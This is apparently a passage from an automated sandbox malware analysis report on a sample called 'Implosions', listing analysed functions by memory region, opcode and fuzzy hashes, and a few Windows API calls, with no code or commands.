              • Instruction Fuzzy Hash: 5DD0A75373001423C754151D78163990797C7C5221FF90979E701C3704CC00A8030394
              Function 05DEA7E0 Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eb6a2b6c9f8acf88a0657bc295f9333431775ff983975596576010678e9ee0a0
              • Instruction ID: 3e334a8d2ef88fb25bd609ae1ff6b19939a537e856735c3aa6a2c6ee5813afdc
              • Opcode Fuzzy Hash: eb6a2b6c9f8acf88a0657bc295f9333431775ff983975596576010678e9ee0a0
              • Instruction Fuzzy Hash: 79E0ECB1D00229DF8B40EFA9994519EBBF4FE48250B104466D509E7200E7319A11CBD1
              Function 05DE6020 Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea10be8f2b49bd2cd8990f05c459ad908c7d01539f373ec4ed89c2926ffdcfd4
              • Instruction ID: 8ebed1cf769277ff1181f5cc2257e9d63ed3e2f8116cc7fc11b39efd4d906b44
              • Opcode Fuzzy Hash: ea10be8f2b49bd2cd8990f05c459ad908c7d01539f373ec4ed89c2926ffdcfd4
              • Instruction Fuzzy Hash: F7E09274E05308AFCB44EFA9E44549DBFF5AB88200F0081AAD808E3340EA349A018F84
              Function 05CAB9F9 Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4bb3db1e7737079a03e9143e7bc5dc6316ab65d2a00c7bbee99ec5ff43711544
              • Instruction ID: 92dd56052a08abac329017e6f0fda14b37e440b241723abbf4a1a36560f1eb0d
              • Opcode Fuzzy Hash: 4bb3db1e7737079a03e9143e7bc5dc6316ab65d2a00c7bbee99ec5ff43711544
              • Instruction Fuzzy Hash: 2DE017722151428FC704EF38C494BAABBE5FF14204F1949ACE082DB268FB309949DF92
              Function 05CE73DB Relevance: .0, Instructions: 17COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2f163b78cfbc78bf186c7c3c5c1da6d865900404be79d68ccd4578e3b903bb62
              • Instruction ID: 5352dd3f9385aa11478cfcd7e513ab24c757b1668ca41bf6c618c1cd3be1989a
              • Opcode Fuzzy Hash: 2f163b78cfbc78bf186c7c3c5c1da6d865900404be79d68ccd4578e3b903bb62
              • Instruction Fuzzy Hash: E9D0A733600014174610505A680D98A7B68DDD05217080137E604C3340EA208516A1F9
              Function 05DE651B Relevance: .0, Instructions: 17COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9954cd8829ed89ae1c9bc7fbd5231fbb69a57dce3e7701e7fdc617fbf89c02fc
              • Instruction ID: 36774833c625bf7deed5164268fcf138c8339028583a99651a50031de14bcba6
              • Opcode Fuzzy Hash: 9954cd8829ed89ae1c9bc7fbd5231fbb69a57dce3e7701e7fdc617fbf89c02fc
              • Instruction Fuzzy Hash: 68D0A7373547108FCB55A634F01533C7751EBC1222F00003AD105CB790CE61E446C7D4
              Function 05CA51B0 Relevance: .0, Instructions: 17COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 68025d37cb44d96b98308b95b6641bbf2ff95fc53be1234e65c6ba77504ec49f
              • Instruction ID: 4a6df3ba1b131a8659955fa120f1361e2f62c0bf5d4a460aaf88cc379d82c5f0
              • Opcode Fuzzy Hash: 68025d37cb44d96b98308b95b6641bbf2ff95fc53be1234e65c6ba77504ec49f
              • Instruction Fuzzy Hash: 6CD0A7B6B401078FFF24553098453B61776B74064CF689C228B22C5244FA11CE0BC213
              Function 05CA5A20 Relevance: .0, Instructions: 16COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6ee1320a9c6bd52bd8e71f7b9cd1b7ac5f374c952776119dbe4d5f1cb1b9364
              • Instruction ID: 7ee79c342455d2fad8c11741a9a36ee78091fb99df20f5044141a806a61abfb1
              • Opcode Fuzzy Hash: b6ee1320a9c6bd52bd8e71f7b9cd1b7ac5f374c952776119dbe4d5f1cb1b9364
              • Instruction Fuzzy Hash: D7D0A7343102108FC6009718D404D9677E9EB4D721B014096F905C7360CEB2FC008BC4
              Function 05CEEE01 Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6d02096baed7821825683c75e242eb212aea78f1c4fc6b533177dd98dd0a0021
              • Instruction ID: e1ee68a594039390d49f3d42ba153c626b6d87016b38576856fd239a54c3fd35
              • Opcode Fuzzy Hash: 6d02096baed7821825683c75e242eb212aea78f1c4fc6b533177dd98dd0a0021
              • Instruction Fuzzy Hash: A7D0A73254130CDFC700AA64D88179C7B74EB56208F45812AD405AB600EB28E095C7D1
              Function 05DEF5E0 Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 595d0cd23dbfd4fb088df0ab19c496e9587f0579b0bc10a166fe7af1a69de007
              • Instruction ID: 1bcf00fa9aa274f935e23f46402dd6d68883305584598743b80a34d262f45143
              • Opcode Fuzzy Hash: 595d0cd23dbfd4fb088df0ab19c496e9587f0579b0bc10a166fe7af1a69de007
              • Instruction Fuzzy Hash: 15D023315017145FCB307F18D24477177C9BF01D24F40105FD04542E00CBA0B8414B85
              Function 05DE56F1 Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5f93f51236884f34a2eaff89ec19ebb553ffca33d11e27843c53c178b081016
              • Instruction ID: bf271a3700aa47379a132bbca34020b535531216f564de99d78aad1786485329
              • Opcode Fuzzy Hash: d5f93f51236884f34a2eaff89ec19ebb553ffca33d11e27843c53c178b081016
              • Instruction Fuzzy Hash: 70D05E3294974ECFC701AB74D4188A97F69FF52301B1141AED0412B502FA34A5B5DB91
              Function 05DE660B Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c153b395273be572c163ba3370487d1734f0b17238cc1aa0aa94b14e0a627941
              • Instruction ID: 2455fbb6c880830d05580163fc43671775e8bdd8ca6d2d13b39a6d43e09938f8
              • Opcode Fuzzy Hash: c153b395273be572c163ba3370487d1734f0b17238cc1aa0aa94b14e0a627941
              • Instruction Fuzzy Hash: F5C08023714160530554515C74584FE1697CBCA5613D8017AF505D3344CCD09C05D3B8
              Function 05DE6063 Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a8d84b73a328a90d1ce5fe1a3ea7326cfd7efa765f46a201dcc1d9e43c5d300f
              • Instruction ID: b5732f0562a70d6fe9bad3082c29b8e0f6052e7643135009910b5e0aebff8284
              • Opcode Fuzzy Hash: a8d84b73a328a90d1ce5fe1a3ea7326cfd7efa765f46a201dcc1d9e43c5d300f
              • Instruction Fuzzy Hash: DEC0123560030A7B4B00DAA4994159AB7ADD741504B404B969D09A3300E9319E145A9B
              Function 05DEE917 Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 161ce3d492b20a9b5271e395089bbf0272d8d15994ec9eb7ce2cf430093a18e7
              • Instruction ID: 336785e723c2f5f1cf0539920605ec7b961d54c5be151ffea7897bf956fc3070
              • Opcode Fuzzy Hash: 161ce3d492b20a9b5271e395089bbf0272d8d15994ec9eb7ce2cf430093a18e7
              • Instruction Fuzzy Hash: C9D02E3020D3848BDF81EF68B09A3A03F61AB42600F4000C5F98083784CF242088DF05
              Function 05CEC98B Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b59b06cfbc36abef774e1706d53b31ef3be1ca534a4e43729b078c8f63a93a9c
              • Instruction ID: 409b6ccc91b9f26fc53b8873f7944908acbc0bd983a61239511fab15cc300cf5
              • Opcode Fuzzy Hash: b59b06cfbc36abef774e1706d53b31ef3be1ca534a4e43729b078c8f63a93a9c
              • Instruction Fuzzy Hash: 2BC08031115645DBDB4017B3DC0D7267E5CFF45301F480129F54AC3A41EE14F55086D5
              Function 05CEC998 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf8a551dca21ad7c3b0a00bc8eb8605023af688bd814b3fb97ed8356aa812c19
              • Instruction ID: 42bac032e53737a121b4e041329568b149a1d04cadf6007d3f8be460b560cce3
              • Opcode Fuzzy Hash: bf8a551dca21ad7c3b0a00bc8eb8605023af688bd814b3fb97ed8356aa812c19
              • Instruction Fuzzy Hash: 4CC02B30224A0C4FDB402BF1BC093273B9CF740211F840025F40EC3640DE14E800C5E4
              Function 05DE56CB Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38342f204bcfda2e63980b1713e0e12021bf1c7e97c0a276880adfa76f0b3cb8
              • Instruction ID: c30517795f32bfd49456cce33c7536a410be09865e649df1e2d7f28ee93818ad
              • Opcode Fuzzy Hash: 38342f204bcfda2e63980b1713e0e12021bf1c7e97c0a276880adfa76f0b3cb8
              • Instruction Fuzzy Hash: 3ED0123295070DCFCB40BA68D5458597B78FB15704B80526AE4457A110EB30B5A9CB91
              Function 05CEEE10 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a650402a9fe7c8ac378a167736f13049d0fcfae01cbd4ae1fe495142d7cc5307
              • Instruction ID: f64786afd4dbbb1983a5877966d075c6558cc47d43004a542fff65f1a52e3d2e
              • Opcode Fuzzy Hash: a650402a9fe7c8ac378a167736f13049d0fcfae01cbd4ae1fe495142d7cc5307
              • Instruction Fuzzy Hash: A4C0123185070CCECB40BAA8E404898BBB8BB56605B00822AE4496B100EB21A1A9CB91
              Function 05DE5700 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c869027703d3befd26d5f54e988c7eca6a87624dcc246962ab7ae34b233ef877
              • Instruction ID: aaa41ddbf2694ade6ce348e77da9d3e4b46d8f93256714c7b7663352347cbcfe
              • Opcode Fuzzy Hash: c869027703d3befd26d5f54e988c7eca6a87624dcc246962ab7ae34b233ef877
              • Instruction Fuzzy Hash: B4C0123285070DCEC740BB68D4044997B78BB15701B004519D4452A100EB20A1A5C791
              Function 05DE56D0 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a2753973cadf8af43be92c4974538570b63a913afbf525835b8fdd15b49c296f
              • Instruction ID: ca0ab7be580f8722398d7f267f63189117138d33b39900e161c0177b9b9b6242
              • Opcode Fuzzy Hash: a2753973cadf8af43be92c4974538570b63a913afbf525835b8fdd15b49c296f
              • Instruction Fuzzy Hash: 5BC0123195070DCEC700BA68D4048597B78FB15600B405119D4452A110EB30A5A9CB91
              Function 05D607F0 Relevance: .0, Instructions: 9COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: daf1ddf8379f27491b8cabf5aa8d4f976391727f5c332d9cb206e4eae7556cea
              • Instruction ID: c6d1c2c93a15632ffe8649fe7a27e64fcf3d513e9111f8eb6318287c4940858b
              • Opcode Fuzzy Hash: daf1ddf8379f27491b8cabf5aa8d4f976391727f5c332d9cb206e4eae7556cea
              • Instruction Fuzzy Hash: 84C08C30084300FEEF5127A0EC2AB5FBF72ABD4300F00C803B054309E0CE726210CA9A
              Function 05DEFD70 Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4eb1b43b759e29a83da716a4e48b3556e67a10b66746cd1b47abdc590f0327dc
              • Instruction ID: 8aa1f2a19b5a19cafc3cd4126a77fc4be6065a1a3f6e2f6764b8dfc910973acd
              • Opcode Fuzzy Hash: 4eb1b43b759e29a83da716a4e48b3556e67a10b66746cd1b47abdc590f0327dc
              • Instruction Fuzzy Hash: 24C04C35217300CBC7159B64B4697953F21B751751F51951AE44283260DB39404BEF05
              Function 05D64B7B Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80f5597802a6e9e408f2ad50d7b39b80864356321910f7224fd7009129086485
              • Instruction ID: 6013b81bcae8c5bb5e842255f083ada525c1e55b0bc7769309d2e1ebfac7bf11
              • Opcode Fuzzy Hash: 80f5597802a6e9e408f2ad50d7b39b80864356321910f7224fd7009129086485
              • Instruction Fuzzy Hash: BFC04C31510109CFCF50EB58ED85B147FA1FB4630BF581155D4419A19DC774E499CB46
              Function 05CEBEEB Relevance: .0, Instructions: 7COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b87e625a21d25c9923b9797f5fdc3ddd4666feb316b1ecbd2f76b074ff00b41
              • Instruction ID: 0c8de22ae38bc9f0672ab346f7fa875b6d299af4a76ed22cfcb008233426805b
              • Opcode Fuzzy Hash: 4b87e625a21d25c9923b9797f5fdc3ddd4666feb316b1ecbd2f76b074ff00b41
              • Instruction Fuzzy Hash: BEB02B1110039AC7DB452BB4801F3112E21C740202F8404C1B19046380CC28D440A519

              Non-executed Functions

              Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 004136F4
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
              • TerminateProcess.KERNEL32(00000000), ref: 00413737
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID:
              • API String ID: 2579439406-0
              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
              Function 05DE0040 Relevance: 6.2, Strings: 1, Instructions: 4928COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 45_q
              • API String ID: 0-1720489888
              • Opcode ID: 62270dc796c0ef5c065d9fef33c49e1fa3bb2751874700320dca08a6ecf0ff1b
              • Instruction ID: bbc5605fd3254369e1cb45d1b6e1c5f42fe4d30d284803fde228b349a7490585
              • Opcode Fuzzy Hash: 62270dc796c0ef5c065d9fef33c49e1fa3bb2751874700320dca08a6ecf0ff1b
              • Instruction Fuzzy Hash: 3EA32D31E50B1AA6EB209B64CC41BD9F371BF96700F60C756B6587A5C0EBB07AC5CB90
              Function 05DE0033 Relevance: 6.2, Strings: 1, Instructions: 4922COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 45_q
              • API String ID: 0-1720489888
              • Opcode ID: f690ea555c0be81cf8a3d3d6569cd6f63d8c656e8d00454c4360872ebcab7fa2
              • Instruction ID: 84fae3f38faeb5292369bcb007cbff295d8883e02bdc14ed5d95c2cc1049f113
              • Opcode Fuzzy Hash: f690ea555c0be81cf8a3d3d6569cd6f63d8c656e8d00454c4360872ebcab7fa2
              • Instruction Fuzzy Hash: 35A32D31E50B1AA6EB209B64CC41BD9F371BF96700F60C756B6587A5C0EBB07AC5CB90
              Function 00408C60 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: @$@$PA
              • API String ID: 0-3039612711
              • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
              • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
              • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
              • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
              Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.KERNEL32 ref: 0040ADD0
              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
              Function 021BE4EF Relevance: 1.6, Strings: 1, Instructions: 316COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2910396162.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_21b0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: Hbq
              • API String ID: 0-1245868
              • Opcode ID: 79cc84bad144a38ba027bd1427d2fbe64aeef99591bc8092105bfdffef136b37
              • Instruction ID: 5bf54d1889dcf4a7f05b2345b11842dacdf97ffb8803fcc3e5106174e5ee0f2f
              • Opcode Fuzzy Hash: 79cc84bad144a38ba027bd1427d2fbe64aeef99591bc8092105bfdffef136b37
              • Instruction Fuzzy Hash: 44B16C34B402159FDB15DFB8D494AAEBBF6EF88340B548569E505DB3A5EF30EC028B90
              Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
              • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
              • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
              • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
              Function 00407C3F Relevance: .8, Instructions: 783COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
              • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
              • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
              • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
